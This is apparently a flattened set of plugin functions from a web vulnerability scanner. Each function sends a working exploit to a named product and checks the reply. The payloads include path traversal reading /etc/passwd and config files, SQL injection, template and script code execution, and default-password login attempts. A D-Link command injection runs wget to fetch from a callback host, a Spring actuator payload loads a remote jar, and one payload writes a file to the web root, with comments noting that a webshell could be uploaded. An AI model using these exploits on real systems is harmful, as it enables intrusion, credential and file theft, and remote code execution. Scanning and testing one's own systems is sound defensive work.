def count_status(): red = getredis() while True: try: time.sleep(int(scan_set.get("status_flush_time", 30))) burpdata_undo = red.llen("burpdata") if scan_set.get("random_test", False): # workdata = red.spop("work_data_py_set") unactive = red.scard("work_data_py_set") else: # red.lpush("work_data_py", pickledata) # workdata = red.lpop("work_data_py") unactive = red.llen("work_data_py") vuln = red.llen("vuln_all") data = red.hmget("count_all", "doned", "request", "block_host", "request_fail", "active") burpdata_doned, request, block_host, request_fail, active = list( map(lambda x: x.decode(), data)) reverse_count = 0 res, resdata = query_reverse("myscan_total") if res: reverse_count = int(resdata.get("total")) if cmd_line_options.command == "hostscan": logger.warning( "do/undo/active/unactive:{}/{}/{}/{} vuln:{}/reverse:{}". format(burpdata_doned, burpdata_undo, active, unactive, vuln, reverse_count), text="STATUS") elif cmd_line_options.command == "webscan": if cmd_line_options.allow_plugin: undoplugin = red.llen("plugin_data_py") logger.warning( "do/undo/active/unactive/undoplugin:{}/{}/{}/{}/{} req_total/fail:{}/{} blockhost:{} vuln:{}/reverse:{}" .format(burpdata_doned, burpdata_undo, active, unactive, undoplugin, request, request_fail, block_host, vuln, reverse_count), text="STATUS") else: logger.warning( "do/undo/active/unactive:{}/{}/{}/{} req_total/fail:{}/{} blockhost:{} vuln:{}/reverse:{}" .format(burpdata_doned, burpdata_undo, active, unactive, request, request_fail, block_host, vuln, reverse_count), text="STATUS") except KeyboardInterrupt as ex: logger.warning("Ctrl+C was pressed ,aborted program") except Exception as ex: logger.warning("Count stat moudle get error:{}".format(ex)) traceback.print_exc() pass
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return for file_, search in {"file:///c://windows/win.ini": [b"for 16-bit app support", b"[extensions]"], "file:///etc/passwd": [b"root:[x*]:0:0:"]}.items(): req = { "method": "GET", "url": self.url + "wxjsapi/saveYZJFile?fileName=test&downloadUrl={}&fileExt=txt".format(file_), "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers "timeout": 10, "verify": False, "allow_redirects": False } r = request(**req) if r != None and r.status_code == 200 and "json" in r.headers.get("Content-Type", "") and b"id" in r.content: res = re.search("\"id\"\:\"(?P<var>.+?)\"\,", r.text) if res: var = res.groupdict().get('var') req["url"] = self.url + "file/fileNoLogin/{}".format(var) r1 = request(**req) if r1 is not None and r1.status_code == 200 and all([re.search(x, r1.content) for x in search]): parser_ = response_parser(r1) self.result.append({ "name": self.name, "url": parser_.geturl(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return rand_s = get_random_str(5) req = { "method": "POST", "url": self.url + "webtools/control/xmlrpc", "headers": {"Content-Type": "application/xml"}, "data": '''<?xml version="1.0"?><methodCall><methodName>{rand}</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>'''.format( rand=rand_s), "timeout": 10, "verify": False, "allow_redirects": False } r = request(**req) if r is not None and r.status_code == 200 and b"methodResponse" in r.content and ("No such service [{}".format( rand_s)).encode() in r.content: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": parser_.geturl(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return cmds, hexdata = generate_reverse_payloads("dlink-cve-2019-16920-rce" + self.url) url = cmds[0].split(" ")[-1] req = { "method": "POST", "url": self.url + "apply_sec.cgi", "headers": { "Content-Type": "application/x-www-form-urlencoded", }, "data": '''html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20{}'''.format( url), "timeout": 10, "verify": False, "allow_redirects": False } r = request(**req) res, resdata = query_reverse(hexdata) if r != None and res: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": parser_.geturl(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "others":"{} in reverse data".format(hexdata), "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return req = { "method": "GET", "url": self.url + "info", "headers": self.dictdata.get("request").get("headers"), "timeout": 10, "verify": False, "allow_redirects": False } r = request(**req) if r != None and r.status_code == 200 and b"KernelVersion" in r.content and b"RegistryConfig" in r.content and b"DockerRootDir" in r.content: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": parser_.geturl(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return random_int = get_random_num(5) req = { "method": "GET", "url": self.url + "index.php?c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df¶m=action=sql%20sql=%27select%20md5({})%27" .format(random_int), "headers": self.dictdata.get("request").get("headers"), "timeout": 10, "allow_redirects": False, "verify": False, } r = request(**req) if r != None and r.status_code == 200 and ( getmd5(random_int)[10:20]).encode() in r.content: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return rand1 = random.randint(40000, 44800) rand2 = random.randint(40000, 44800) req = { "method": "POST", "url": self.url + "weaver/bsh.servlet.BshServlet", "headers": { "Content-Type": "application/x-www-form-urlencoded", }, "data": "bsh.script=print%28{}*{}%29&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw".format(rand1, rand2), "timeout": 10, "allow_redirects": False, "verify": False, } r = request(**req) if r != None and r.status_code == 200 and (str(rand1 * rand2)).encode() in r.content: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": parser_.geturl(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return req = { "method": "GET", "url": self.url + "weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml", "timeout": 10, "allow_redirects": False, "verify": False, } r = request(**req) if r != None and r.status_code == 200 and b"<url-pattern>/weaver/" in r.content: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": parser_.geturl(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return req = { "method": "GET", "url": self.url + "?a=display&templateFile=README.md", "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers "timeout": 10, "verify": False, "allow_redirects": False } r = request(**req) if r != None and r.status_code == 200 and b"ThinkCMF" in r.content and b"## README" in r.content: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": parser_.geturl(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return req = { "method": "GET", "url": self.url + "_plugin/head/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd", "timeout": 10, "allow_redirects": False, "verify": False, } r = request(**req) if r != None and r.status_code == 200 and re.search( b"root:[x*]:0:0:", r.content): parser_ = response_parser(r) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return req = { "method": "GET", "url": self.url + "status%3E%3Cscript%3Exxxxxx(31337)%3C%2Fscript%3E", "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers "timeout": 10, "verify": False, } r = request(**req) if r != None and r.status_code == 200 and b'<script>xxxxxx(31337)</script>' in r.content and b'nginx vhost traffic status monitor' in r.content: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return req = { "method": "GET", "url": self.url + "nexus/service/siesta/capabilities", "timeout": 10, "allow_redirects": False, "verify": False, } r = request(**req) if r != None and r.status_code == 401: req["url"] = self.url + "nexus/service/local/authentication/login" for passwd in ["YWRtaW46YWRtaW4xMjM=", "YWRtaW46YWRtaW4="]: req["headers"] = { "Accept": "application/json", "Authorization": "Basic {}".format(passwd) } r = request(**req) if r != None and r.status_code == 200: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": req.get("url"), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } }) break
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return num = get_random_num(4) num_md5 = getmd5(num) req = { "method": "GET", "url": self.url + "viewthread.php?tid=10", # "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers "cookies": { "GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Bsearcharray%5D": "/.*/eui", "GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Breplacearray%5D": "print_r(md5({}))".format(num) }, "timeout": 10, "verify": False, } r = request(**req) if r != None and r.status_code == 200 and num_md5[10:20].encode( ) in r.content: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": parser_.geturl(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return req = { "method": "GET", "url": self.url + "languages.php?id=wechat:wechat&ac=wxregister", # "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers "timeout": 10, "allow_redirects": False, "verify": False, } r = request(**req) if r != None and r.status_code == 302 and "set-cookie" in r.headers and "auth" in r.headers[ "set-cookie"] and "location" in r.headers and "wsq.discuz.com" in r.headers[ "location"]: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": parser_.geturl(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return random_str = get_random_num(4) req = { "method": "GET", "url": self.url + "tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5" + str(random_str) + ";{/dede:field}", "headers": self.dictdata.get("request").get("headers"), "timeout": 10, "verify": False, "allow_redirects": True } r = request(**req) if r != None and r.status_code == 200 and (getmd5( str(random_str))[10:20]).encode() in r.content: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": parser_.geturl(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return user = get_random_str(6).lower() pass_ = get_random_str(6).lower() req = { "method": "POST", "url": self.url + "pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1", "headers": { "Content-Type": "application/xml", "X-NITRO-USER": user, "X-NITRO-PASS": pass_, }, "data": "<appfwprofile><login></login></appfwprofile>", "timeout": 10, "allow_redirects": False, "verify": False, } r = request(**req) if r is not None and r.status_code == 406 and re.search( "SESSID=\w{32}", r.headers.get("Set-Cookie", "")): parser_ = response_parser(r) self.result.append({ "name": self.name, "url": req.get("url"), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return req = { "method": "GET", "url": self.url + "index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)", "headers": self.dictdata.get("request").get("headers"), "timeout": 10, "allow_redirects": False, "verify": False, } r = request(**req) if r != None and r.status_code == 500 and b"cf79ae6addba60ad018347359bd144d2" in r.content: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return req = { "method": "GET", "url": self.url + "public/admin.html?s=admin/api.Update/version", "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers "timeout": 10, "verify": False, "allow_redirects": False } r = request(**req) if r != None and r.status_code == 200 and "json" in r.headers.get("Content-Type", ""): try: data = r.json() ver = data.get("data", {}).get("wechat", {}).get("version", "999999999999").replace(".", "") print(ver) if int(ver) <= 2020080301: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": parser_.geturl(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } }) except Exception as ex: print(ex) pass
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return req = { "method": "POST", "url": self.url + "actuator/env", "headers": { "Content-Type": "application/json" }, "data": '''{ "name": "spring.datasource.hikari.connection-init-sql", "value":"CREATE ALIAS remoteUrl AS $$ import java.net.*;@CODE String remoteUrl() throws Exception { Class.forName(\"pop\", true, new URLClassLoader(new URL[]{new URL(\"http://127.0.0.1:9001/pop.jar\")})).newInstance();return null;}$$; CALL remoteUrl()" }''', "timeout": 10, "verify": False, } r = request(**req) if r is not None and r.status_code == 200 and b"spring.datasource.hikari.connection-init-sql" in r.content and "application/vnd.spring-boot.actuator" in str( r.headers): parser_ = response_parser(r) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return req = { "method": "POST", "url": self.url + "rest/tinymce/1/macro/preview", "headers": { "Content-Type": "application/json", "Referer":"http://localhost", "Host":"localhost" }, "data":'''{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"}}}''', "timeout": 10, "allow_redirects": False, "verify": False, } r = request(**req) if r != None and r.status_code == 200 and b"<param-name>contextConfigLocation</param-name>" in r.content : parser_ = response_parser(r) self.result.append({ "name": self.name, "url": req.get("url"), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return for referer in [ '''554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca''', '''45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a''' ]: req = { "method": "GET", "url": self.url+"user.php", "headers":{ "Referer":referer, }, "timeout": 10, "allow_redirects": False, "verify": False, } r = request(**req) if r != None and r.status_code == 200 and b"PHP Version" in r.content and b"<title>phpinfo()</title>" in r.content: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } }) return
def verify(self): if self.dictdata.get("url").get("protocol") != "https": return # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return req = { "method": "GET", "url": self.url + "dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/", "timeout": 10, "allow_redirects": False, "verify": False, } r = request(**req) if r != None and r.status_code == 200 and re.search( b"root:[x*]:0", r.content): parser_ = response_parser(r) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def verify(self): # 添加限定条件 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return self.parser = dictdata_parser(self.dictdata) filename = get_random_str(4) + ".txt" random_str = get_random_str(10) # payload = "http|echo \"<?php echo(passthru(\\$_GET['cmd']));?>\" >> /usr/www/" + shell_filename + " && chmod +x /usr/www/" + shell_filename + "||" payload = "http|echo \"" + random_str + "\" >> /usr/www/" + filename + " && chmod +x /usr/www/" + filename + "||" req = { "method": "GET", "url": self.url + "include/makecvs.php?Event=" + payload, "verify": False, "timeout": 10, } r = request(**req) time.sleep(1) if r is not None and r.status_code == 200 and b"Service,DateTime" in r.content: req["url"] = self.url + filename r1 = request(**req) if r1 is not None and random_str.encode() in r1.content: parser1 = response_parser(r1) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "others": "you can upload your webshell", "request": parser1.getrequestraw(), "response": parser1.getresponseraw() } })
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return req = { "method": "GET", "url": self.url + "include/downmix.inc.php", "headers": self.dictdata.get("request").get("headers"), "timeout": 10, "verify": False, "allow_redirects": False } r = request(**req) if r != None and r.status_code == 200 and b"Fatal error" in r.content and b"downmix.inc.php" in r.content and b"Call to undefined function helper()" in r.content: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": parser_.geturl(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return req = { "method": "POST", "url": self.url + "hedwig.cgi", "headers": { "Content-Type": "text/xml", "Cookie": "uid=R8tBjwtFc8" }, "data": '''<?xml version="1.0" encoding="utf-8"?><postxml><module><service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service></module></postxml>''', "timeout": 10, "verify": False, "allow_redirects": False } r = request(**req) if r != None and r.status_code == 200 and b"</usrid>" in r.content and b"</password>" in r.content and b"<result>OK</result>" in r.content: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": parser_.geturl(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return req = { "url": self.url + "ueditor/net/controller.ashx?action=catchimage&encode=utf-8", "method": "GET", "headers": { "Accept-Encoding": "deflate" }, "verify": False, "timeout": 10, } r = request(**req) if r is not None and r.status_code == 200 and b"\xe6\xb2\xa1\xe6\x9c\x89\xe6\x8c\x87\xe5\xae\x9a\xe6\x8a\x93\xe5\x8f\x96\xe6\xba\x90" in r.content: parse = response_parser(r) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "others": "you can exploit it by :http://localhost/ueditor/net/controller.ashx?action=catchimage&encode=utf-8", "request": parse.getrequestraw(), "response": parse.getresponseraw(), } })
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return req = { "method": "GET", "url": self.url + "solr/admin/cores?wt=json", "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers "timeout": 10, "allow_redirects": False, "verify": False, } r = request(**req) if r != None and r.status_code == 200 and b"responseHeader" in r.content: name = re.search('"name":"(.*?)"', r.text) if name: name = name.group(1) req["method"] = "POST" req["headers"] = { "Content-Type": "application/json" } req["data"] = '''{ "update-queryresponsewriter": { "startup": "test", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } }''' req["url"] = self.url + "solr/{name}/config".format(name=name) r1 = request(**req) if r1 != None and r1.status_code == 200: random_1 = get_random_num(4) random_2 = get_random_num(4) req1 = { "method": "GET", "url": self.url + "solr/{name}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set(%24c%3D{r1}%20*%20{r2})%24c".format( name=name, r1=random_1, r2=random_2), "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers "timeout": 10, "allow_redirects": "False", "verify": False, } r2 = request(**req1) if r2 != None and r2.status_code == 200 and str(random_2 * random_1).encode() in r2.content: parser_ = response_parser(r2) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return req = { "method": "GET", "url": self.url + "v2/", "headers": self.dictdata.get("request").get("headers"), "timeout": 10, "verify": False, "allow_redirects": False } r = request(**req) if r != None and r.status_code == 200 and "docker-distribution-api-version" in str( r.headers).lower() and "registry/2.0" in str( r.headers).lower(): req["url"] = self.url + "v2/_catalog" r1 = request(**req) if r1 != None and "application/json" in r1.headers.get( "Content-Type", "") and b"repositories" in r1.content: parser_ = response_parser(r1) self.result.append({ "name": self.name, "url": parser_.geturl(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return random_int = get_random_num(5) md5 = getmd5(random_int) req = { "method": "POST", "url": self.url, "headers": { "Content-Type": "application/x-www-form-urlencoded" }, "data": "routestring=ajax/render/widget_php&widgetConfig%5bcode%5d=print(md5({rand}))%3bexit%3b".format( rand=random_int), "timeout": 10, "allow_redirects": False, "verify": False, } r = request(**req) if r is not None and r.status_code == 200 and md5.encode() in r.content: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return req = { "method": "GET", "url": self.url + "CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en", "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers "timeout": 10, "verify": False, } r = request(**req) if r != None and r.status_code == 200 and b"rdspassword="******"encrypted=" in r.content: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": parser_.geturl(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })